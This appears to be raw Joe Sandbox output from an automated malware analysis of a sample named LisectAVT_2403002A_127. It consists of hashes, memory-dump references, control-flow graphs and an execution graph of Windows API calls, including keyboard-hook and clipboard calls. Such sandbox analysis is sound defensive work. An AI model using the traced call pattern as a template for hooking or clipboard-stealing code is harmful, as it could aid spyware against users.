                                                  • Instruction Fuzzy Hash: C51136B6800249CFDB20CFA9D485BDEBBF4EF88324F24846AD558A7741C339A545CFA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 288 2f11780-2f117f2 PostMessageW 290 2f117f4-2f117fa 288->290 291 2f117fb-2f1180f 288->291 290->291
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 02F117E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 570414f95ca0f2e5495e6caf9c46f2e7243ab1f596ab8f4652507f7a0142c776
                                                  • Instruction ID: a423a0b5ef69700bf61af11ccd8e3440f74aeef6031d03067a7d16cfd96fa318
                                                  • Opcode Fuzzy Hash: 570414f95ca0f2e5495e6caf9c46f2e7243ab1f596ab8f4652507f7a0142c776
                                                  • Instruction Fuzzy Hash: 0011FDB58003499FDB10CF9AD889B9ABBF8EB48314F10845AE958A7611C379A944CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 282 172af98-172afd8 283 172afe0-172b00b GetModuleHandleW 282->283 284 172afda-172afdd 282->284 285 172b014-172b028 283->285 286 172b00d-172b013 283->286 284->283 286->285
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0172AFFE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 6cfe53eebfd378febc4aaf947900c4298a9b35e33a1e5585d167735fbdf4c27b
                                                  • Instruction ID: 8f966e0e65a1d85f408813357150a59bee9a3300bab3dfced31ee57a99f54bd0
                                                  • Opcode Fuzzy Hash: 6cfe53eebfd378febc4aaf947900c4298a9b35e33a1e5585d167735fbdf4c27b
                                                  • Instruction Fuzzy Hash: 12110FB5C006498FDB20CF9AC444BDEFBF4AB88214F10842AD928A7610D379A545CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 293 2f11788-2f117f2 PostMessageW 294 2f117f4-2f117fa 293->294 295 2f117fb-2f1180f 293->295 294->295
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 02F117E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 9dabbbf555aa8da10c7da0e7778597086669f0c3593c32e6c19903f6d4da6f3b
                                                  • Instruction ID: 500a57d5efe09c70eb1b97f38bdf882ad8d827455e92e30ce3017ffad344cf9b
                                                  • Opcode Fuzzy Hash: 9dabbbf555aa8da10c7da0e7778597086669f0c3593c32e6c19903f6d4da6f3b
                                                  • Instruction Fuzzy Hash: 9711EDB58002499FDB10CF9AC885BDFBBF8EB48324F10845AE618A7200C379A944CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c895f2756d192565afd3ecca5f37084bc3750181c90fb26cca334ce072789ff3
                                                  • Instruction ID: 8193520440b659a534c3d18ab8a6ba04cbf75c6195557483515ba87ce82fc057
                                                  • Opcode Fuzzy Hash: c895f2756d192565afd3ecca5f37084bc3750181c90fb26cca334ce072789ff3
                                                  • Instruction Fuzzy Hash: 716230B6E04B458ADBB59F79948C3DEBAA2BB52300F14495FD1BACA390DB34D4C1CB05
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc9ce99cc617388c2ad4afe4f68ee80eb0c3f5d77b3c8194d1db8a7849e6410d
                                                  • Instruction ID: 33f044a7b6eee577d9dbff0bab177de7e2ad6c144c6229c0f8e278add8fe7100
                                                  • Opcode Fuzzy Hash: fc9ce99cc617388c2ad4afe4f68ee80eb0c3f5d77b3c8194d1db8a7849e6410d
                                                  • Instruction Fuzzy Hash: 25125DB1A05B824AD7B55F69858C3DFB691BB17300F24895BC2FAC93A5C734D0C6CB49
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17364077d385785c841958a302027ff47b088ddaf9f9f0a5751108ce66740fa7
                                                  • Instruction ID: 16fca3f7254bf491aead0a22cfa62a5b504724cb3cc60542bca47aa4e6e73b9f
                                                  • Opcode Fuzzy Hash: 17364077d385785c841958a302027ff47b088ddaf9f9f0a5751108ce66740fa7
                                                  • Instruction Fuzzy Hash: 1C612A36B00119DFCB54DFA8D554AEE7BB6FF88611F14806AE906A7354DB319C41CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b8d885dae69d8601170196a15a2f316d3117a483b9549112d1b4412e0c4fee76
                                                  • Instruction ID: 46b1455be5e2829fe7d4d88cbce262dbff44ba6a8ebf677df8c98d6d07fac447
                                                  • Opcode Fuzzy Hash: b8d885dae69d8601170196a15a2f316d3117a483b9549112d1b4412e0c4fee76
                                                  • Instruction Fuzzy Hash: F2516631A00205DFCB14EF68D598AEEBBB6FF95300F10855EE506AB354EB70A945CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d1729bc00b8da31bca7cc91713f1914916bb38aedd2aaabf049fd16c0846803a
                                                  • Instruction ID: c66d67083c76feb247573baf260f7acead39713f25356d9a740326d08c997941
                                                  • Opcode Fuzzy Hash: d1729bc00b8da31bca7cc91713f1914916bb38aedd2aaabf049fd16c0846803a
                                                  • Instruction Fuzzy Hash: A2414B32B00119DFCB45DF64E884AAE7BB7FF98250F14842AF9169B394DB348C56CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b503f265644ad14e4ce940f27a2c1fdefa6e013d29332ac7d2bfad14644c9e2
                                                  • Instruction ID: b84f1da0dc1a0c9a54a7f1a1d60b56c354ada72aab8ca6f28d6e8a25f3d573e7
                                                  • Opcode Fuzzy Hash: 5b503f265644ad14e4ce940f27a2c1fdefa6e013d29332ac7d2bfad14644c9e2
                                                  • Instruction Fuzzy Hash: F121F8B1504204EFDF09DF54E9C0B66BF65FB84314F24C56DDA090B656C336E456CBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 987fd88227542a7e25c4ebc91d4c204203ffbedb01d230f70ca76b38972a0aa2
                                                  • Instruction ID: fc775ae0173b2e68cc2ed770f95ee84499b64051f5a26f3f042e5942e3d9c94d
                                                  • Opcode Fuzzy Hash: 987fd88227542a7e25c4ebc91d4c204203ffbedb01d230f70ca76b38972a0aa2
                                                  • Instruction Fuzzy Hash: 2D21F471500244EFDF09DF54E9C4B26BF75FB84318F20856DDA050B266C336D456CAA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4674a9f2491335219c8e18bc5931c2ad7328f8857ee89681c428369f7d24b7c
                                                  • Instruction ID: 1fd5930adff67256b941d19664ffc3136b4b36bcac442d74bb59ac147cfc9e63
                                                  • Opcode Fuzzy Hash: a4674a9f2491335219c8e18bc5931c2ad7328f8857ee89681c428369f7d24b7c
                                                  • Instruction Fuzzy Hash: BC216D36B4424A8FDB50DFA8C884AAE7BF2FB55211F0540A6E905DB362D734DC81CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd72c747e65d2a7dcf4c1d5e77db15e59afebb9f817d40200b164a39c95e69a2
                                                  • Instruction ID: 7b8d08a383199f7993f9d5296aa129f07a8655f0dd935ba0167c70d741672c50
                                                  • Opcode Fuzzy Hash: cd72c747e65d2a7dcf4c1d5e77db15e59afebb9f817d40200b164a39c95e69a2
                                                  • Instruction Fuzzy Hash: 13213475615308EFDB02DFE8D9C0B26BB61FB84324F20C66DD9090B283C376D846CAA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70c1a879e0f24405d9a1a5a3ccfa8e0676492e9f17ddf43483fa4d55c2368691
                                                  • Instruction ID: 3993d5d9409f269ca69cf3fe83d3e4de20119d7af687efb992ef098ffd70318b
                                                  • Opcode Fuzzy Hash: 70c1a879e0f24405d9a1a5a3ccfa8e0676492e9f17ddf43483fa4d55c2368691
                                                  • Instruction Fuzzy Hash: 7B21D375614208EFDB16DFA8D9C0B16BB66EB84314F20C66DD90D4B287C376D446CA61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 374e91a9bc59d95a81739ccb84207157d731acb75bdff1db065f2e75daa2af22
                                                  • Instruction ID: af55fb97b7f501d099aa8a4d7171f8caf8f404ad79da6a632fcd748a1eca1eab
                                                  • Opcode Fuzzy Hash: 374e91a9bc59d95a81739ccb84207157d731acb75bdff1db065f2e75daa2af22
                                                  • Instruction Fuzzy Hash: F521FA32A00208DFCF44DF94E985AEEBBB5FB48311F14416AE902B7350DB319D55DBA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                  • Instruction ID: 9933acec31053c9b422c6ae631d036673f517e21ce24f66191557a9117926397
                                                  • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                  • Instruction Fuzzy Hash: 9211CD72504240DFCF06CF44D5C0B66BF61FB84224F2482A9D9090A657C33AE45ACBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                  • Instruction ID: 749318cd5fcd5babba88f77ca1ab92b9f79266f7c8223850a206ffa2be559bd9
                                                  • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                  • Instruction Fuzzy Hash: FF11CD72504280DFCF06CF54E5C4B26BF71FB84214F2486A9D9090B266C33AD45ACBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                  • Instruction ID: 479dca2de15fb21bbaa09368f4e72d791b63e7129d3127f765109d2fa1279994
                                                  • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                  • Instruction Fuzzy Hash: F711A975905284DFDB02CF94D5C0B15BBA2FB84224F24C6A9D9094B697C33AD44ACBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193462782.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_120d000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                  • Instruction ID: 86608abf63bbd704afd0a2aad7876a05d0df92ea409648cf2fa630632c583306
                                                  • Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
                                                  • Instruction Fuzzy Hash: 9911BB75504284DFCB12CF94D5C4B15FFA2FB84314F24C6AAD9094B697C33AD40ACBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5fbe4c002ba6968a806e69ea8d3f35dae8ceff4f0652ab0b4dbdf031add3363
                                                  • Instruction ID: 947c7298f1e4554da38d03ba88608e81faeb7d418563d042a995cdec4153d964
                                                  • Opcode Fuzzy Hash: e5fbe4c002ba6968a806e69ea8d3f35dae8ceff4f0652ab0b4dbdf031add3363
                                                  • Instruction Fuzzy Hash: CA01FC71004780DAEB195FA9ED84B76FFD8DF41228F18861EDF050E286C3799441C672
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a306f838dce2d4b111efa6b76e6e2e208dac27dd7da9d1deeab9abbe952e18e3
                                                  • Instruction ID: fb2b2952b62b6e89bb12188ecf40e76c54426d87834a034d9e8f05953fe41b50
                                                  • Opcode Fuzzy Hash: a306f838dce2d4b111efa6b76e6e2e208dac27dd7da9d1deeab9abbe952e18e3
                                                  • Instruction Fuzzy Hash: 2501817661020AAFCB00EA64D948CEFBB78FF85354F00825AE9045B311E630EA59CBE1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7416d9ab62019d0a2307b24086987eb46d2787e3caea4017f3bb982ef86541de
                                                  • Instruction ID: 3918b99e3ade78d761920eaa58b8bc4b99354657f45a92e75233c43c4c108783
                                                  • Opcode Fuzzy Hash: 7416d9ab62019d0a2307b24086987eb46d2787e3caea4017f3bb982ef86541de
                                                  • Instruction Fuzzy Hash: 27F062756101099FCB00EE64D944CDFBB79FF85354B008259E9045B310E730E945CBB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193409359.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_11fd000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e054245210936e11e812264b85470f57448457b6568da40489159e7c948f0fb
                                                  • Instruction ID: f32e0338895b0ebf5d79df14ac2b4dc83db680f005b1e955d4236054bcef864d
                                                  • Opcode Fuzzy Hash: 5e054245210936e11e812264b85470f57448457b6568da40489159e7c948f0fb
                                                  • Instruction Fuzzy Hash: E8F0C271004784AAEB158E59D884B62FFD8EB81638F18C15AEE080F297C3799844CBB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 653b7adc3962d16d3528ff8361cfc140c7bc35306e97cc5d49c7d153b3b1510a
                                                  • Instruction ID: 4c47c9f58e6977e3b4dae94f76731f2afdb7acb680f641bbee7a1e3e41aa5425
                                                  • Opcode Fuzzy Hash: 653b7adc3962d16d3528ff8361cfc140c7bc35306e97cc5d49c7d153b3b1510a
                                                  • Instruction Fuzzy Hash: 79E06D376D4524868210DF4AF4858B7B3A8F7446A531C8497E80CCA661E733D8A2C780
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d90792e3319bb07686d1d4838ba0ec829e7314721e6f62006195dad145254879
                                                  • Instruction ID: e9692000095797efe4da1691de2d7faf4f457b7cf5e325c962e46039d09ce2c6
                                                  • Opcode Fuzzy Hash: d90792e3319bb07686d1d4838ba0ec829e7314721e6f62006195dad145254879
                                                  • Instruction Fuzzy Hash: 78E02236A142849FCB0196E8AD49AE67FA8DB25242F0080B7E986C2603DA348018CF70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196139955.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_54a0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d98d1d9e6d4eb6e964437735863d1bc216d3dc17513843d2eb4dc6fdca75a1f
                                                  • Instruction ID: 425888b574ed65a62249df8f7bfe292ebc21f8a0e637987ea625c1048d41e6ed
                                                  • Opcode Fuzzy Hash: 3d98d1d9e6d4eb6e964437735863d1bc216d3dc17513843d2eb4dc6fdca75a1f
                                                  • Instruction Fuzzy Hash: CEE026336642284FC320EA0AF849FD57798FB00332F898067DA04C7240CB71E840CAD2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2194151633.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2f10000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 387c9a907e15f8783ec9c1aac0e0e7742534f6f9c1a5b4f4b4c2ae642cb4dc33
                                                  • Instruction ID: 895b5625788b3352c25a78d8442666543271486ff691d2e7b6a9c9145a30a061
                                                  • Opcode Fuzzy Hash: 387c9a907e15f8783ec9c1aac0e0e7742534f6f9c1a5b4f4b4c2ae642cb4dc33
                                                  • Instruction Fuzzy Hash: 05D1ED70B002559FDB19EB79C820BAEB7F6AF89744F9444ADC2469B794CF34E802CB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2193901552.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1720000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 764d39cba5191a4e4b3edfc5983bfbbe7d3b0d2aafcf7bbe04083808d2586d0b
                                                  • Instruction ID: 3da95d0066119c1f7dad69fc3101970989d5c343bec0d116dfecf3015280c10b
                                                  • Opcode Fuzzy Hash: 764d39cba5191a4e4b3edfc5983bfbbe7d3b0d2aafcf7bbe04083808d2586d0b
                                                  • Instruction Fuzzy Hash: 0EA19E36E0022ACFCF15DFB5C84499EFBB2FF85300B15856AE901AB265DB35E956CB40

                                                  Execution Graph

                                                  Execution Coverage:12.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:223
                                                  Total number of Limit Nodes:27
                                                  execution_graph 41706 6cba3a9 41708 6cba33a 41706->41708 41710 6cba3b6 41706->41710 41707 6cba346 SetWindowsHookExA 41709 6cba37a 41707->41709 41708->41707 41708->41710 41711 6cb1c28 41712 6cb1c30 GetModuleHandleW 41711->41712 41714 6cb1ca5 41712->41714 41959 6cb2cd8 41960 6cb2d40 CreateWindowExW 41959->41960 41962 6cb2dfc 41960->41962 41963 6cb8618 41964 6cb8623 41963->41964 41966 6cb8633 41964->41966 41967 6cb8070 41964->41967 41968 6cb8668 OleInitialize 41967->41968 41969 6cb86cc 41968->41969 41969->41966 41970 6cb6bd8 DuplicateHandle 41971 6cb6c6e 41970->41971 41715 12cd044 41716 12cd05c 41715->41716 41717 12cd0b6 41716->41717 41725 6cb77de 41716->41725 41733 6cb0dd4 41716->41733 41737 6cb0de4 41716->41737 41745 6cb2e90 41716->41745 41751 6cb2e80 41716->41751 41757 6cb2ee3 41716->41757 41764 6cb2fbe 41716->41764 41728 6cb780d 41725->41728 41726 6cb7841 41779 6cb6724 41726->41779 41728->41726 41729 6cb7831 41728->41729 41767 6cb7958 41729->41767 41773 6cb7968 41729->41773 41730 6cb783f 41734 6cb0ddf 41733->41734 41842 6cb0e0c 41734->41842 41736 6cb2fc7 41736->41717 41738 6cb0def 41737->41738 41739 6cb7841 41738->41739 41741 6cb7831 41738->41741 41740 6cb6724 2 API calls 41739->41740 41742 6cb783f 41740->41742 41743 6cb7958 2 API calls 41741->41743 41744 6cb7968 2 API calls 41741->41744 41743->41742 41744->41742 41746 6cb2eb6 41745->41746 41747 6cb2ec2 41746->41747 41748 6cb0dd4 GetModuleHandleW 41746->41748 41749 6cb0de4 2 API calls 41747->41749 41748->41747 41750 6cb2ed7 41749->41750 41750->41717 41752 6cb2eb6 41751->41752 41753 6cb2ec2 41752->41753 41754 6cb0dd4 GetModuleHandleW 41752->41754 41755 6cb0de4 2 API calls 41753->41755 41754->41753 41756 6cb2ed7 41755->41756 41756->41717 41758 6cb2eb4 41757->41758 41761 6cb2eea 41757->41761 41759 6cb0dd4 GetModuleHandleW 41758->41759 41760 6cb2ec2 41759->41760 41762 6cb0de4 2 API calls 41760->41762 41761->41717 41763 6cb2ed7 41762->41763 41763->41717 41765 6cb2fc7 41764->41765 41766 6cb0e0c GetModuleHandleW 41764->41766 41765->41717 41766->41765 41768 6cb7976 41767->41768 41769 6cb6724 2 API calls 41768->41769 41770 6cb7a4e 41768->41770 41786 6cb7e31 41768->41786 41791 6cb7e40 41768->41791 41769->41768 41770->41730 41776 6cb7976 41773->41776 41774 6cb6724 2 API calls 41774->41776 41775 6cb7a4e 41775->41730 41776->41774 41776->41775 41777 6cb7e31 OleGetClipboard 41776->41777 41778 6cb7e40 OleGetClipboard 41776->41778 41777->41776 41778->41776 41780 6cb672f 41779->41780 41781 6cb7aaa 41780->41781 41782 6cb7b54 41780->41782 41784 6cb7b02 CallWindowProcW 41781->41784 41785 6cb7ab1 41781->41785 41783 6cb0de4 OleGetClipboard 41782->41783 41783->41785 41784->41785 41785->41730 41787 6cb7e36 41786->41787 41788 6cb7e26 41787->41788 41796 6cb7ff8 41787->41796 41802 6cb7fe7 41787->41802 41788->41768 41792 6cb7e5f 41791->41792 41793 6cb7e64 41792->41793 41794 6cb7ff8 OleGetClipboard 41792->41794 41795 6cb7fe7 OleGetClipboard 41792->41795 41793->41768 41794->41792 41795->41792 41798 6cb8000 41796->41798 41797 6cb8014 41797->41787 41798->41797 41808 6cb8432 41798->41808 41819 6cb8440 41798->41819 41799 6cb8029 41799->41787 41804 6cb7ff8 41802->41804 41803 6cb8014 41803->41787 41804->41803 41806 6cb8432 OleGetClipboard 41804->41806 41807 6cb8440 OleGetClipboard 41804->41807 41805 6cb8029 41805->41787 41806->41805 41807->41805 41809 6cb843a 41808->41809 41810 6cb846d 41809->41810 41812 6cb84b1 41809->41812 41815 6cb8432 OleGetClipboard 41810->41815 41816 6cb8440 OleGetClipboard 41810->41816 41811 6cb8473 41811->41799 41814 6cb8531 41812->41814 41830 6cb86f8 41812->41830 41834 6cb8708 41812->41834 41813 6cb854f 41813->41799 41814->41799 41815->41811 41816->41811 41820 6cb8452 41819->41820 41821 6cb846d 41820->41821 41823 6cb84b1 41820->41823 41826 6cb8432 OleGetClipboard 41821->41826 41827 6cb8440 OleGetClipboard 41821->41827 41822 6cb8473 41822->41799 41825 6cb8531 41823->41825 41828 6cb86f8 OleGetClipboard 41823->41828 41829 6cb8708 OleGetClipboard 41823->41829 41824 6cb854f 41824->41799 41825->41799 41826->41822 41827->41822 41828->41824 41829->41824 41831 6cb8708 41830->41831 41833 6cb8743 41831->41833 41838 6cb8188 41831->41838 41833->41813 41835 6cb871d 41834->41835 41836 6cb8188 OleGetClipboard 41835->41836 41837 6cb8743 41835->41837 41836->41835 41837->41813 41839 6cb87b0 OleGetClipboard 41838->41839 41841 6cb884a 41839->41841 41843 6cb0e17 41842->41843 41848 6cb0c9c 41843->41848 41845 6cb3029 41847 6cb3097 41845->41847 41853 6cb0cac 41845->41853 41849 6cb0ca7 41848->41849 41850 6cb16f3 41849->41850 41857 6cb193b 41849->41857 41865 6cb19de 41849->41865 41850->41845 41854 6cb1c30 GetModuleHandleW 41853->41854 41856 6cb1ca5 41854->41856 41856->41847 41858 6cb197e 41857->41858 41859 6cb0cac GetModuleHandleW 41858->41859 41860 6cb1a7a 41859->41860 41861 6cb0cac GetModuleHandleW 41860->41861 41864 6cb1af4 41860->41864 41862 6cb1ac8 41861->41862 41863 